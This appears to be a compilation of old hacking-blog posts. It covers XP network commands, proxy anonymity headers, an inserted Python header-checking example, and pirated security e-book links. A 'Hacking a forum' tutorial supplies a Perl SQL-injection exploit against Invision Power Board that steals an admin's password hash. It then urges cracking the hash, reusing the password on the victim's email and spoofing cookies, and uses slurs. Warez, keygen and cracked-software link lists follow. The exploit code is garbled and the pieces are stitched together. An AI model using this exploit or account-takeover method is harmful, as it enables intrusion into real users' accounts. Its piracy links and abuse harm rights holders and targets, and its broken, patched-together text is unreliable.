Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\>

Your first step is to find out what commands you can run in DOS. If you type "help" at the DOS prompt, it gives you a long list of commands. However, this list leaves out all the commands hackers love to use. Here are some of those left out hacker commands.

TCP/IP commands:
telnet
netstat
nslookup
tracert
ping
ftp

NetBIOS commands (just some examples):
nbtstat
net use
net view
net localgroup

TCP/IP stands for transmission control protocol/Internet protocol. As you can guess by the name, TCP/IP is the protocol under which the Internet runs, along with user datagram protocol (UDP). So when you are connected to the Internet, you can try these commands against other Internet computers. Most local area networks also use TCP/IP.

NetBIOS (Net Basic Input/Output System) protocol is another way to communicate between computers. This is often used by Windows computers, and by Unix/Linux type computers running Samba. You can often use NetBIOS commands over the Internet (being carried inside of, so to speak, TCP/IP). In many cases, however, NetBIOS commands will be blocked by firewalls. Also, not many Internet computers run NetBIOS because it is so easy to break in using them. We will cover NetBIOS commands in the next Guide to XP Hacking.


Anonymity of Proxy  

Anonymity of Proxy

Information on the Internet is exchanged using the "client - server" model. A client sends a request (which files it needs) and a server sends a reply (the requested files). So that client and server understand each other fully, the client sends additional information about itself: the name and version of its operating system, the configuration of its browser (including its name and version), etc. The server may need this information in order to decide which version of a web page to send to the client, since there are different variants of web pages for different browser configurations. However, since web pages usually do not depend on the browser, it makes sense to hide this information from the web server.

What your browser transmits to a web-server:
a name and a version of an operating system
a name and a version of a browser
configuration of a browser (display resolution, color depth, java / javascript support, ...)
IP-address of a client
Other information

The most important part of such information (and absolutely needless for a web-server) is information about IP-address. Using your IP it is possible to know about you the following:
a country where you are from
a city
your provider's name and e-mail
your physical address

The information transmitted by a client to a server is available to the server as environment variables. Each unit of information is the value of some variable. If a unit of information is not transmitted, the corresponding variable is empty (its value is undetermined).

These are some environment variables:

REMOTE_ADDR - IP address of the client

HTTP_VIA - if it is not empty, a proxy is used. The value is the address (or several addresses) of the proxy server; this variable is added by the proxy server itself if you use one.

HTTP_X_FORWARDED_FOR - if it is not empty, a proxy is used. The value is the real IP address of the client (your IP); this variable is also added by the proxy server if you use one.

HTTP_ACCEPT_LANGUAGE - the language used in the browser (the language a page should be displayed in)

HTTP_USER_AGENT - the so-called "user agent". For all browsers this is Mozilla. Furthermore, the browser's name and version (e.g. MSIE 5.5) and the operating system (e.g. Windows 98) are also mentioned here.

HTTP_HOST - the web server's name

This is a small part of environment variables. In fact there are much more of them (DOCUMENT_ROOT, HTTP_ACCEPT_ENCODING, HTTP_CACHE_CONTROL, HTTP_CONNECTION, SERVER_ADDR, SERVER_SOFTWARE, SERVER_PROTOCOL, ...). Their quantity can depend on settings of both a server and a client.

These are examples of variable values:

REMOTE_ADDR = 194.85.1.1
HTTP_ACCEPT_LANGUAGE = ru
HTTP_USER_AGENT = Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
HTTP_HOST = www.webserver.ru
HTTP_VIA = 194.85.1.1 (Squid/2.4.STABLE7)
HTTP_X_FORWARDED_FOR = 194.115.5.5

Your anonymity on the Internet is determined by which of these environment variables are "hidden" from the web server.

If a proxy server is not used, then environment variables look in the following way:

REMOTE_ADDR = your IP
HTTP_VIA = not determined
HTTP_X_FORWARDED_FOR = not determined

According to how the environment variables are "hidden" by proxy servers, there are several types of proxies:
Transparent Proxies

They do not hide information about your IP address:

REMOTE_ADDR = proxy IP
HTTP_VIA = proxy IP
HTTP_X_FORWARDED_FOR = your IP

The function of such proxy servers is not to improve your anonymity on the Internet. Their purpose is caching of information, organizing shared Internet access for several computers, etc.

Anonymous Proxies

All proxy servers that hide a client's IP address in any way are called anonymous proxies.

Simple Anonymous Proxies

These proxy servers do not hide the fact that a proxy is used, but they replace your IP with their own:
REMOTE_ADDR = proxy IP
HTTP_VIA = proxy IP
HTTP_X_FORWARDED_FOR = proxy IP

These proxies are the most widespread among other anonymous proxy servers.

Distorting Proxies

As with simple anonymous proxy servers, these proxies do not hide the fact that a proxy server is used. However, the client's IP address (your IP address) is replaced with another (arbitrary, random) IP:

REMOTE_ADDR = proxy IP
HTTP_VIA = proxy IP
HTTP_X_FORWARDED_FOR = random IP address

High Anonymity Proxies

These proxy servers are also called "high anonymity proxies". In contrast to the other types of anonymous proxy servers, they hide the fact that a proxy is used at all:

REMOTE_ADDR = proxy IP
HTTP_VIA = not determined
HTTP_X_FORWARDED_FOR = not determined

That means the variables have the same values as when no proxy is used, with one very important exception: the proxy's IP appears instead of your IP address.

Summary

Depending on their purpose, there are transparent and anonymous proxies. However, remember that a proxy server hides only your IP from the web server; the other information (about your browser configuration) is still accessible!
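As an added example (not code from the original article), the classification above written as a Python function over the CGI-style variables the article lists, plus the check a server operator wants alongside it: X-Forwarded-For can be set by any client, so it is only meaningful when the directly connected address is a proxy you operate. The `your_ip` and `trusted_proxies` parameters and the sample dump (built from the article's example values) are assumptions made for this example.

```python
"""Classify what a web server sees through a proxy, using the CGI-style
variables the article describes (REMOTE_ADDR, HTTP_VIA, HTTP_X_FORWARDED_FOR).
Added example; not code from the original article."""

import ipaddress
from typing import Dict, Iterable, List

# Constructed sample dump in the article's "NAME = value" layout (test data only).
SAMPLE_DUMP = """\
REMOTE_ADDR = 194.85.1.1
HTTP_ACCEPT_LANGUAGE = ru
HTTP_USER_AGENT = Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
HTTP_HOST = www.webserver.ru
HTTP_VIA = 194.85.1.1 (Squid/2.4.STABLE7)
HTTP_X_FORWARDED_FOR = 194.115.5.5
"""


def parse_env_dump(text: str) -> Dict[str, str]:
    """Turn 'NAME = value' lines into a dict; 'not determined' or an empty
    value means the variable is absent, exactly as on a real CGI server."""
    env: Dict[str, str] = {}
    for line in text.splitlines():
        name, sep, value = line.partition("=")
        value = value.strip()
        if sep and value and value != "not determined":
            env[name.strip()] = value
    return env


def forwarded_chain(env: Dict[str, str]) -> List[str]:
    """X-Forwarded-For may carry a comma-separated chain; each proxy appends
    the address it saw, so the leftmost entry is the earliest claimed origin."""
    raw = env.get("HTTP_X_FORWARDED_FOR", "")
    return [hop.strip() for hop in raw.split(",") if hop.strip()]


def is_ip(value: str) -> bool:
    """True when value parses as an IPv4 or IPv6 address."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return False


def classify_proxy(env: Dict[str, str], your_ip: str) -> str:
    """Client-side view: you know your own address (`your_ip`, an assumption
    for this example) and look at what the server received. Returns one of
    'none', 'transparent', 'simple anonymous', 'distorting', 'high anonymity'
    following the article's tables."""
    remote = env.get("REMOTE_ADDR", "")
    via = env.get("HTTP_VIA", "")
    chain = forwarded_chain(env)
    xff = chain[0] if chain else ""

    if not via and not xff:
        # Looks exactly like a direct connection; only REMOTE_ADDR tells them apart.
        return "none" if remote == your_ip else "high anonymity"
    if xff == your_ip:
        return "transparent"          # proxy disclosed, your IP leaked
    if not xff or xff == remote:
        return "simple anonymous"     # proxy disclosed, your IP replaced by the proxy's
    return "distorting"               # proxy disclosed, some other address substituted


def effective_client_ip(env: Dict[str, str], trusted_proxies: Iterable[str]) -> str:
    """Server-side check: anyone can send X-Forwarded-For themselves, so honour
    it only when REMOTE_ADDR is a proxy you operate (`trusted_proxies`, an
    assumption for this example). Walk the chain right to left, skipping your
    own proxies; the first other hop is what your nearest proxy really saw."""
    trusted = set(trusted_proxies)
    remote = env.get("REMOTE_ADDR", "")
    if remote not in trusted:
        return remote                 # direct client: ignore any header it supplied
    for hop in reversed(forwarded_chain(env)):
        if hop in trusted:
            continue
        return hop if is_ip(hop) else remote
    return remote                     # chain empty or made only of our own proxies
```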


Huge list of books  

Friday, February 1, 2008



acker's book Identifying Attackers | http://rapidshare.com/files/80521327/www-h...g-attackers.pdf
Hack Attacks Revealed | http://rapidshare.com/files/80521836/Hack_...ks_Revealed.pdf
Hackers Secrets | http://rapidshare.com/files/80521881/Hackers_Secrets.pdf
Maximum Security - A Hacker's Guide to Protecting Your Inter | http://rapidshare.com/files/80522774/Maxim..._Your_Inter.pdf
Hack Proofing - Your Network - Internet Tradecraft | http://rapidshare.com/files/80525311/Hack_..._Tradecraft.pdf
Hack Proofing Your Wireless Network | http://rapidshare.com/files/80525674/Hack_...ess_Network.pdf
Hacking Exposed Network Security Secrets & Solutions, Third | http://rapidshare.com/files/80525820/Hacki...ons__Third_.pdf
Hacking Exposed- Web Applications | http://rapidshare.com/files/80530894/Hacki...-Hill-2002_.pdf
Cross Site Scripting Detection and Prevention | http://rapidshare.com/files/80534573/Cross..._prevention.pdf
Hack IT Security Through Penetration Testing | http://rapidshare.com/files/80535490/Hack_...ion_Testing.pdf
Hacker Secret Book | http://rapidshare.com/files/80535523/Hacker_Secret_Book.pdf
Hackerland | http://rapidshare.com/files/80535553/Hackerland.pdf
Hacker's Encyclopedia | http://rapidshare.com/files/80535564/Hacke...ncyclopedia.txt
Hacking Exposed | http://rapidshare.com/files/80536064/Hacking_Exposed.pdf
HACKKIT | http://rapidshare.com/files/80536092/HACKKIT.TXT
Hugo Cornwall - The Hacker's Handbook | http://rapidshare.com/files/80536117/Hugo_...s_Handbook_.pdf
ICMP Scanning v2.0 | http://rapidshare.com/files/80536148/ICMP_Scanning_v2.0.pdf
IIS_Security_and_Programming_Countermeasures | http://rapidshare.com/files/80536371/IIS_S...termeasures.pdf
Improve by Breaking | http://rapidshare.com/files/80536377/improve_by_breakin.txt
Maximum Security | http://rapidshare.com/files/80536559/Maximum_Security.pdf
Network - The Hacker Crackdown | http://rapidshare.com/files/80536598/Netwo...r_Crackdown.pdf
PC TIPS & TRICKS - Hacker Bible | http://rapidshare.com/files/80536612/PC_TI...Bibel_2000_.pdf
Practical Stealth Portscan Discovery | http://rapidshare.com/files/80536625/Pract...ice-ccs2000.pdf
Practical-SEH-exploitation | http://rapidshare.com/files/80536685/Pract...xploitation.pdf
Hall PTR Internet Denial of Service Attack and Defense Mechanisms | http://rapidshare.com/files/80536799/Prent...s.eBook-DDU.zip
Router Security Guidance Activity | http://rapidshare.com/files/80536939/Route...ce_Activity.pdf
XML_Secuirty | http://rapidshare.com/files/80537208/XML_Secuirty.pdf
100 Ways To Disappear | http://rapidshare.com/files/80537236/100_W...o_Disappear.doc
Hack IT Security Through Penetration Testing | http://rapidshare.com/files/80537514/Addis...esting-2002.chm
Computer Vulnerabilities | http://rapidshare.com/files/80537550/Compu...erabilities.pdf
Configuring Windows 2000 Server Security | http://rapidshare.com/files/80537787/Confi...er_Security.pdf
Hacker Web Exploitation Uncovered | http://rapidshare.com/files/80552331/Hacke...89_waushare.rar
A Plus Network Plus Security Plus Exams in A Nutshell | http://rapidshare.com/files/80557304/A_Plu..._A_Nutshell.pdf
Handbook of Database Security | http://rapidshare.com/files/80561473/Handb....0387485325.rar
The International Handbook of Computer Security | http://rapidshare.com/files/80562155/The.Tags: I...y.eBook-EEn.pdf
Auerbach Information Security Management Handbook 6th Edition | http://rapidshare.com/files/80566300/Auerb...Edition-BBL.rar
Router Security | http://rapidshare.com/files/80571279/Route...ce_Activity.pdf
Firewall Book | http://rapidshare.com/files/80572125/Junip...rewall_Book.pdf
Building Internet Firewalls | http://rapidshare.com/files/80572698/Build...ition_eBooK.pdf



Wiley The Web Application Hackers Handbook  

Wiley The Web Application Hackers Handbook



TITLE : The Web Application Hacker's Handbook: Discovering and Exploiting Security Flaws (Paperback)
AUTHOR : by Dafydd Stuttard (Author), Marcus Pinto (Author)
PUBLISHER : Wiley publisher
ISBN : 0470170778
EDITION : 1st
PUB DATE : October 22, 2007
LANGUAGE : English
RLS DATE : 12/02/2007

MAKER : BBL
SUPPLIER : BBL
PACKAGER : BBL
FORMAT : PDF
SIZE : 02 x 2.88 MB

[ R e l e a s e N o t e s ]

This book is a practical guide to discovering and exploiting security
flaws in web applications. The authors explain each category of
vulnerability using real-world examples, screen shots and code extracts.
The book is extremely practical in focus, and describes in detail the
steps involved in detecting and exploiting each kind of security
weakness found within a variety of applications such as online banking,
e-commerce and other web applications. The topics covered include
bypassing login mechanisms, injecting code, exploiting logic flaws and
compromising other users. Because every web application is different,
attacking them entails bringing to bear various general principles,
techniques and experience in an imaginative way. The most successful
hackers go beyond this, and find ways to automate their bespoke attacks.
This handbook describes a proven methodology that combines the virtues
of human intelligence and computerized brute force, often with
devastating results. The authors are professional penetration testers
who have been involved in web application security for nearly a decade.
They have presented training courses at the Black Hat security
conferences throughout the world. Under the alias "PortSwigger", Dafydd
developed the popular Burp Suite of web application hack tools.

Link for download:- http://w15.easy-share.com/13783591.html





Firewall Fundamentals  

Firewall Fundamentals


ISBN: 1587052210
Author: Wes Noonan / Ido Dubrawsky
Publisher: Cisco Press
Summary:

The essential guide to understanding and using firewalls to protect personal computers and your network

  • An easy-to-read introduction to the most commonly deployed network security device
  • Understand the threats firewalls are designed to protect against
  • Learn basic firewall architectures, practical deployment scenarios, and common management and troubleshooting tasks
  • Includes configuration, deployment, and management checklists

Increasing reliance on the Internet in both work and home environments has radically increased the vulnerability of computing systems to attack from a wide variety of threats. Firewall technology continues to be the most prevalent form of protection against existing and new threats to computers and networks. A full understanding of what firewalls can do, how they can be deployed to maximum effect, and the differences among firewall types can make the difference between continued network integrity and complete network or computer failure. Firewall Fundamentals introduces readers to firewall concepts and explores various commercial and open source firewall implementations--including Cisco, Linksys, and Linux--allowing network administrators and small office/home office computer users to effectively choose and configure their devices. Firewall Fundamentals is written in clear and easy-to-understand language and helps novice users understand what firewalls are and how and where they are used. It introduces various types of firewalls, first conceptually and then by explaining how different firewall implementations actually work. It also provides numerous implementation examples, demonstrating the use of firewalls in both personal and business-related scenarios, and explains how a firewall should be installed and configured. Additionally, generic firewall troubleshooting methodologies and common management tasks are clearly defined and explained.

URL:

Code:
http://www.amazon.com/exec/obidos/redirect?tag=songstech-20&path=ASIN%2F1587052210

Code:
http://rapidshare.com/files/74286503/fwfundamentals.rar


Metasploit Toolkit for Penetration Testing, Exploit Development, and Vulnerability Research  

Metasploit Toolkit for Penetration Testing, Exploit Development, and Vulnerability Research


ISBN: 1597490741
Author: James Foster
Publisher: Syngress
Summary:
This is the first book available for the Metasploit Framework (MSF), which is the attack platform of choice for one of the fastest growing careers in IT security: Penetration Testing. The book and companion Web site will provide professional penetration testers and security researchers with a fully integrated suite of tools for discovering, running, and testing exploit code.

This book discusses how to use the Metasploit Framework (MSF) as an exploitation platform. The book begins with a detailed discussion of the three MSF interfaces: msfweb, msfconsole, and msfcli. This chapter demonstrates all of the features offered by the MSF as an exploitation platform. With a solid understanding of MSF's capabilities, the book then details techniques for dramatically reducing the amount of time required for developing functional exploits.
By working through real-world vulnerabilities against popular closed source applications, the reader will learn how to use the tools and MSF to quickly build reliable attacks as standalone exploits. The section will also explain how to integrate an exploit directly into the Metasploit Framework by providing a line-by-line analysis of an integrated exploit module. Details as to how the Metasploit engine drives the behind-the-scenes exploitation process will be covered, and along the way the reader will come to understand the advantages of exploitation frameworks. The final section of the book examines the Meterpreter payload system and teaches readers to develop completely new extensions that will integrate fluidly with the Metasploit Framework.

  • A November 2004 survey conducted by "CSO Magazine" stated that 42% of chief security officers considered penetration testing to be a security priority for their organizations

  • The Metasploit Framework is the most popular open source exploit platform, and there are no competing books

  • The book's companion Web site offers all of the working code and exploits contained within the book
URL:

Code:
http://www.amazon.com/exec/obidos/redirect?tag=songstech-20&path=ASIN%2F1597490741

Code:
http://rapidshare.com/files/74225816/Metasploit_Toolkit.rar


44 books  

44 hack books

Code:
A Buffer Overflow Study - Attacks and Defenses (2002).pdf 470.27 KB
Addison Wesley - 2004 - Wi-Foo The Secrets of Wireless Hacking.chm 6.73 MB
Amazon Hacks - (O\'reilly-August 2003).chm 2.83 MB
Computer Vulnerability(March 9 2000).pdf 390.33 KB
Crackproof Your Software(No Starch-2002).pdf 7.17 MB
Credit Card Visa Hack(Cambridge Lab-2003).pdf 223.34 KB
Ethical Hacking and Countermeasures EC Council Exam 312 50 (OSB- 2004).chm 14.15 MB
Google Hacking for Penetration Tester (Syngress-2005).pdf 13.44 MB
Hack Attacks Revealed- A Complete Reference with Custom Security Hacking Toolkit (Wiley-2001).pdf 8.06 MB
Hack IT Security Through Penetration Testing (Addison Wesley-2002).chm 4.58 MB
Hack Proofing Your Identity in the Information Age (Syngress-2002).pdf 8.90 MB
Hack Proofing Your Network - Internet Tradecraft (Syngress-2000).pdf 2.95 MB
Hacker Disassembling Uncovered (A List- 2003).chm 4.72 MB
Hacker's Desk Reference.pdf 714.83 KB
Hackers Beware (NewRiders -2002).pdf 4.62 MB
Hackers Delight( Addison Wesley- 2003 ).chm 2.11 MB
Hacking Exposed- Network Security Secrets and Solutions (MCGraw-Hill-2001).pdf 8.05 MB
Hacking Exposed- Web Applications (MCGraw-Hill-2002).pdf 7.58 MB
Hacking Exposed- Windows 2003 Chapter 5.pdf 915.51 KB
Hacking for Dummies (John Wiley-2004).pdf 9.28 MB
Hacking for Dummies-Access to Other Peoples Systems Made Simple.pdf 1.26 MB
Hacking Guide v3.1[www.netz.ru].pdf 1.20 MB
Hacking-The Art of Exploitation(No Starch-2003).chm 1.40 MB
How Thieves Targeted eBay Users but Got Stopped Instead(Interhack-June 2003).pdf 131.83 KB
Malware - Fighting Malicious Code (Prentice Hall-November 21 2003).chm 6.34 MB
Maximum Security, 3rd Edition(Sams-April 2001).chm 2.14 MB
Maximum Security_-A Hackers Guide to Protect Your Internet .chm 1.29 MB
Network Security Tools (OReilly- Apr 2005).chm 1.29 MB
PC Hacks(Oct 2004).chm 5.96 MB
PDF Hack(Aug 2004).chm 3.53 MB
Practical Study Remote Access (Cisco-December 22, 2003).chm 2.47 MB
Reversing Secrets of Reverse Engineering (Apr 2005).pdf 8.37 MB
Spidering Hacks(O\'Reilly- October 2003).chm 1.39 MB
Steal This Computer Book 3 What They Won\'t Tell You About the Internet(No Starch Press - 2003 ).chm 13.74 MB
Stealing the Network; How to Own the Box ( Syngress-2003).pdf 4.59 MB
The Art of Deception by Kevin Mitnick.pdf 5.19 MB
The Art of Intrusion-The Real Stories Behind the Exploits of Hackers Intruders and Deceivers (Wiley- Feb 2005).pdf 3.07 MB
The Complete History of Hacking.pdf 135.64 KB
The Extreme Searchers Internet Handbook A Guide for the Serious Searcher (Feb 2004).pdf 7.07 MB
Tricks of the Internet Gurus (April 1999).pdf 5.67 MB
Underground Hacking Madness & Obsession on the Electronic Frontier (Suelette Dreyfus & Julian Assange-2001).pdf 1.48 MB
Web Hacking- Attacks and Defence (Pearson Education-August 08, 2002).chm 6.32 MB
Windows Server Hack(O\'Reilly - March 2004).chm 1.83 MB
Windows XP Hacks (O\'reilly- Auguest 2003).chm 5.18 MB


Code:
http://rapidshare.com/files/36701929/1.rar
http://rapidshare.com/files/36703610/2.rar



Hacking a forum  

This is what you like to call "Hacking a forum".

I call it "Cracking into a forum" ... Learn what hacking means

PS: I am hacking a forum slowly, everything i am doing now, is posted here by steps :

First of all, what you need is a forum to hack. For the sake of this tutorial, and for the safety of a specific site, I will not release the URL of the site that I will be hacking in this. I will be referring to it as "hackingsite".


So you've got your target. You know the forum you want to hack, but how? Let's find the user we want to hack. Typically, you'd want to hack the admin. The administrator is usually the first member, therefore his/her User ID will be "1". Find the User ID of the administrator, or person you wish to hack. For this tutorial, let's say his/her ID is "2".

Got it? Well, now we are almost all set. So far, we know the site we wish to hack, and the member we wish to hack. In this case, we are hacking the administrator of "hackingsite", which is User ID "2".

Now we need a nice exploit. I preferably, for 1.3.1 forums, use one that is in common circulation around these forums. For those who don't have it, here:


CODE
#!/usr/bin/perl -w
##################################################################
# This one actually works Smiley Just paste the outputted cookie into
# your request header using livehttpheaders or something and you
# will probably be logged in as that user. No need to decrypt it!
# Exploit coded by "ReMuSOMeGa & Nova" and http://remusomega.com
##################################################################

use LWP::UserAgent;

$ua = new LWP::UserAgent;
$ua->agent("Mosiac 1.0" . $ua->agent);

if (!$ARGV[0]) {$ARGV[0] = '';}
if (!$ARGV[3]) {$ARGV[3] = '';}

my $path = $ARGV[0] . '/index.php?act=Login&CODE=autologin';
my $user = $ARGV[1]; # userid to jack
my $iver = $ARGV[2]; # version 1 or 2
my $cpre = $ARGV[3]; # cookie prefix
my $dbug = $ARGV[4]; # debug?

if (!$ARGV[2])
{
print "..By ReMuSoMeGa & Nova. Usage: ipb.pl http://forums.site.org [id] [ver 1/2].\n\n";
exit;
}

my @charset = ("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f");

my $outputs = '';

for( $i=1; $i < j="0;" current =" $charset[$j];" sql =" (" cookie =" ('Cookie'"> $cpre . "member_id=31337420; " . $cpre . "pass_hash=" . $sql);
my $res = $ua->get($path, @cookie);

# If we get a valid sql request then this
# does not appear anywhere in the sources
$pattern = '';

$_ = $res->content;

if ($dbug) { print };

if ( !(/$pattern/) )
{
$outputs .= $current;
print "$current\n";
last;
}

}
if ( length($outputs) < member_id=" . $user . " pass_hash="">


What the f--k,Pretty confused, aren't you? What the f--k are you supposed to do with this shit?! I'll tell you. First of all, this is a Perl script. Copy and paste that code into Notepad.

How can you execute Perl scripts? Well, you can upload them to your CGI-BIN, or you can take my route of preference, and install Perl on your PC.

You're going to want to go and get ActivePerl. I am sure it's here somewhere in Appz.

Open the file up, and let it install. Leave everything on default. In other words, just keep hitting "OK".

So now you have Perl installed. Open up "My Computer", and then click on "Local Disk (C:/)". In there, you should see a folder named "Perl". Open up that folder, and within "Perl", you should see another folder named "bin". Open up "bin". Now that you're in, drag and drop "ipb.pl" from your desktop, into "bin".


Alrighty. Now everything is fine, and you're ready to Pwn some FAGS ...

What you're going to want to do now, is open up your command prompt. If you don't know how, please quit this site, and die.... Start - Run - CMD

Alright, so now you're in your command prompt. You want to change the directory in your command prompt to your Perl/bin directory. To do this, type the following into your command prompt, and hit enter:

cd C:\Perl\bin


Good job. You're very, very close to being finished. Now that you are in the Perl/bin directory, we need to access the ipb.pl file. How do we do this? Type the following command into your command prompt:

perl ipb.pl


So, this is what we need to do. Type the following command into your command prompt:

ipb.pl http://hackingsite.com/forum 2 1

Obviously replace "http://hackingsite.com/forum" with the URL to the forum you wish to hack.

Now, this may take a minute. The exploit is gathering information, and grabbing the hash. Numbers/letters will slowly appear down the screen. Don't be alarmed, and allow the program a few minutes. Once the hash grabbing is complete, it will return a full hash, as well as User ID.

Now you have the hash. In our case, the hash is: 4114d9d3061dd2a41d2c64f4d2bb1a7f

But what can we do with this hash? To you, it just looks like a scramble of numbers and letters. What this is, is an MD5 hash. This is the person's password, encrypted using the MD5 algorithm. I urge you to do a quick read-up on MD5 hashes before continuing reading.

Done? You understand the very basics of MD5s? Good. You're probably thinking: I just read that MD5 hashes cannot be cracked!

LOL.. Indeed, MD5s are impossible to reverse. Once a string is MD5ed, there is no way to get it back to plain-text. It is IMPOSSIBLE to decrypt an MD5 hash. But.. It is NOT impossible to CRACK an MD5 hash.

There are many places online where you can enter hashes to be cracked. Personally, I use "Cain & Abel", which is a great MD5 cracker available at 'http://odix.it'.

You can use any method, and any crackers to crack this hash. 90% of the hashes I get, I am able to crack. Once you crack the hash, you will be given a plain-text password.

CONGRATS! You now have the victim's password! You can now login to his/her account on whatever forum you were hacking. Hell, you could even try that password on his/her e-mail or MSN/AIM account. SureFire bro, f--k them up

But what if the hash is not crackable? You are merely left with a password hash. What can you do with this?

Well, you can spoof your cookie!

If you would like to learn more on spoofing cookies, use the friendly searching site they call "GOOGLE"

Good luck!


Serialz Crackz and Warez sites  

http://serialz.to
http://serials.ws
http://keygen.us

http://www.allseek.info/(Excellent for finding keygens)
http://cracks.ms/(serials and keygens, cracks)
http://seriall.com/ (keygens and serialls)
http://www.extropia.com/tutorials/sql/toc.html
http://www.phazeddl.com/ (cracks/wares)
http://ddlspot.com/ (cracks/wares)
http://www.geekologie.com/ (geek news)
http://torrent-finder.com/ (find torrents from top-of-the-line torrent sites with one search)
http://cracks.md/ (great for cracks and keygens)
http://serialdevil.com/ (great for serials)
http://e-dll.com/ (great for cracks/serials)
http://crackbot.net/ (great for cracks/serials/gens)
http://macserialz.org/ (warez of course ? )

theserials.com - for serials
crackfind.com - for cracks

http://cracks.am
http://www.cerials.net
http://www.newcracks.net
http://www.gamecopyworld.com
http://www.100grams.com
http://www.trinsic.org
http://www.fatmacserials.com

Warez
http://www.phazeddl.com
http://ddl2.com
http://planetddl.com


And most importantly http://www.google.com ---> the ultimate hacking tool Grin Grin

Enjoy


MeGa CollEctIoN Of NeWest Port@bLE APPlic@Tion$  

Saturday, January 19, 2008

A portable application, or portable app for short, is a software program that does not require any kind of formal installation onto a computer's permanent storage device to be executed, and can be stored on a removable storage device such as a CD-ROM, USB flash drive, flash card, or even a floppy disk, enabling it to be used on multiple computers. This does not mean that it can be taken and used on a different operating system, processing platform, or another computer with completely different hardware (i.e., those that are not compatible with the software as stated by its requirements), so it is not to be confused with the concept of software portability, which is the ability for software to be run or compiled with little modification on diverse computing platforms. Ideally it can be configured to read its configuration files from the same storage location as the software program files.




huge collection of Portable appz including:

Aida32
Ashampoo Burning Studio 2007
Audio Player
Avast
BitComet0.74Portable
C Cleaner
Cute FTP Pro 8.0 Portable
CyberShredder
DeepBurner_Portable
DVD Decrypter
DVD Region + CSS Free v5.9
DVD Shrink
EasyCleaner
FirefoxPortable
fusion
GetDataBack 3.03 For Fat
GIMP Portable Picture Editor
Goog.Ear.v4.2.with.Sky
HD CLEAN
HDD Life Pro 2.9.105
hddhealth
IceSword1.18en
LimeWire_4.12.3_Portable
Media Player Classic
micro
Norton Portable
Portable IDM
Portable TuneUp Utilities 2007
PortablePDFReaderPro
PowerDvd_Portable
Recover my Files 3.98 Build 5124 Portable
Spyware Doctor 4.0.0.2618 Portable
WhereIsIt 3.75 Portable
Winamp
WinRAR 3.61 Portable
winxp usb edition
Word portable
7zip 4.42 portable
Alcohol 120% 1.9.5.3823 Portable
Audio Edit Magic 9.21 Portable
AVG Anti Virus 7.5 Portable
Babylon Pro Portable
CloneDVD2 2.8.9.5 Portable
dBpowerAmp 11.5 Portable
Everest Ultimate 2006
FireFox 2.0 Portable
Internet Explorer 7 Portable
IrfanView 3.99 Portable
Kaspersky AntiVirus 6.0.1.41 Portable
LCISOCreator
Msn 7.5 Portable
Multi Password Recovery 0.2.6 Portable
Nero 7.2.0.3b Portable
P. Lightroom 1.1
Paragon Drive BackUp 6.01.041 Portable
Partition Manager 8.0 Pro Portable
Port Proxy SwitcherPro 3.7.3647 Portable
Port_APMS_6.0.4
Super Internet TV 6.8.0.0 Portable
TMPGEnc MPEG Editor 1.0.1.59 Portable
UltraISO Premium Edition 8.6.0 Build 1936 Portable
UninstallTool 1.6.6
VideoLan 0. 8.5r.2 Portable
WinAvi Video Converter 7.7 Portable
Yahoo Messenger 7.5 Portable







Passwrd mansur


C Cleaner:




Over 80 million downloads!!!
CCleaner is a freeware system optimization and privacy tool. It removes unused files from your system - allowing Windows to run faster and freeing up valuable hard disk space. It also cleans traces of your online activities such as your Internet history. But the best part is that it's fast (normally taking less than a second to run) and contains NO Spyware or Adware! smile.gif

Download:

http://rapidshare.com/files/52580187/C_Cleaner_by_mansur.rar

Cute FTP Pro 8.0 Portable:

CuteFTP 8 is the latest product release from GlobalSCAPE, a leading provider of managed file transfer software. The latest version of its excellent FTP client is available in both Home ($39.99) and Professional ($59.99) versions. Home offers value and ease-of-use for the casual user, while Professional maintains that ease-of-use and adds strong security and automation of tasks for business users.

Key new additions to CuteFTP 8 include PGP encryption, podcasting support (dedicated Podcast Manager feature), expanded backup options, in addition to improved search and enhancements to the interface that make it even easier to use than ever before. Really, using CuteFTP Professional 8.0 is a snap - from installing the software, to entering FTP server details and managing folder views.

CuteFTP 8 isn't a revolution in FTP, but it is a logical evolution of GlobalSCAPE's client application. The addition of PGP encryption to existing SSL and SSH security makes CuteFTP 8 rock solid for file transfer security and compatibility, and its Task Automation Wizards make configuring automated transfers such as site mirroring, site back-ups and scheduled transfers quick and intuitive.

You have a variety of features which enhance file transfer. The accessible interface allows you to easily update and maintain sophisticated Web sites. You can safeguard transfers of mission critical files with CuteFTP Professional's security features, as well as speed the transfer of large architectural, graphic, or engineering files with multi-part accelerated downloads. Site caching allows you to minimise bandwidth while you browse, and you can even schedule and script FTP transactions using the autonomous Transfer Engine.

CuteFTP Professional includes the Transfer Engine (TE), and an integrated HTML editor. You can use the Transfer Engine from within CuteFTP, or with any COM enabled scripting or programming language. The HTML editor can create, open, and edit local or remote HTML documents, right in CuteFTP.

CuteFTP 8 meets industry demands for FTP clients thanks to PGP encryption and decryption, which helps ensure compatibility with industry standards and keeps your data secure during transfer and storage. The new PodCast Manager is a neat tool for handling all of your podcast subscriptions and publishing in one application (it creates podcast RSS feeds, uploads new audio files and automatically downloads new episodes), and the Local Backup quickly and easily backs up your computer to a remote server for added data security.

In the professional view, the main window is divided into four panes: Local pane, Remote pane, Individual Session Log pane, and the bottom pane that has the Queue Window tab and the Log Window tab. You can also choose to use Home View, which is also a four-pane view with the log displayed above the local and remote panes and the queue underneath. This is the classic view found in earlier versions of CuteFTP.

Local pane has two tabs: Local Drives and Site Manager. The Local Drives tab displays the files available for upload on local computer and the Site Manager tab displays the list of your FTP sites. The Remote pane displays the list of files available for download to your local computer, while the Log pane displays the time and date of uploads, downloads, and other events that occur.

The Bottom pane has two tabs: Queue Window and Log Window. The Queue Window displays the status of the uploads and downloads and the Log Window displays the FTP connection information for all remote sites, number of sites you are connected to and the other log details of the session, such as the time, date, and so on.

